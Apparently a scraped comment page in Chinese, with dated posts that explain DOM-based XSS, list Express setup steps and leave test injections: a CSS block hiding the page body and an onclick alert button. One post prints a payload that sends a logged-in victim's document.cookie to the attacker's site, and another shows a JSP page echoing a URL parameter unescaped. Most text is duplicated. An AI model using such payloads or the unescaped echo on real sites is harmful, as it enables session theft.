<style>
body{
display:none!important
}
</style>
body{
display:none!important
}
</style>
2018-05-26
1, 安装node
2, npm install -g express
3, npm install -g express-generator
4, cd进入xss项目文件
5, express -e
2, npm install -g express
3, npm install -g express-generator
4, cd进入xss项目文件
5, express -e
2018-05-18
这是下半部:
假设我知道了小明也注册了该网站,并且知道了他的邮箱(或者其它联系方式),我做一个超链接发给他,超链接地址为:http://www.a.com?content=<script>window.open(“www.b.com?param=”+document.cookie)</script>,当小明点击这个链接的时候(假设他已经登录a.com),浏览器就会直接打开b.com,并且把小明在a.com中的cookie信息发送到b.com,b.com是我搭建的网站,当我的网站接收到该信息时,我就盗取了小明在a.com的cookie信息,cookie信息中可能存有登录密码,攻击成功!
假设我知道了小明也注册了该网站,并且知道了他的邮箱(或者其它联系方式),我做一个超链接发给他,超链接地址为:http://www.a.com?content=<script>window.open(“www.b.com?param=”+document.cookie)</script>,当小明点击这个链接的时候(假设他已经登录a.com),浏览器就会直接打开b.com,并且把小明在a.com中的cookie信息发送到b.com,b.com是我搭建的网站,当我的网站接收到该信息时,我就盗取了小明在a.com的cookie信息,cookie信息中可能存有登录密码,攻击成功!
2018-05-12
评论字数限制,这是上半部:
DOM Based XSS是一种基于网页DOM结构的攻击。假设当我登录a.com后,我发现它的页面某些内容是根据url中的一个叫content参数直接显示的,猜测它的页面处理可能是这样,其它语言类似:
<html>
<head>
<title>XSS测试</title>
</head>
<body>
<%=request.getParameter("content")%> //看这里看这里,意思就是在页面输出content参数的内容,如果不做任何屏蔽,会有什么结果呢?
</body>
</html>
DOM Based XSS是一种基于网页DOM结构的攻击。假设当我登录a.com后,我发现它的页面某些内容是根据url中的一个叫content参数直接显示的,猜测它的页面处理可能是这样,其它语言类似:
<html>
<head>
<title>XSS测试</title>
</head>
<body>
<%=request.getParameter("content")%> //看这里看这里,意思就是在页面输出content参数的内容,如果不做任何屏蔽,会有什么结果呢?
</body>
</html>
2018-05-12
<button onclick="alert('攻击我')">攻击</button>
2018-04-28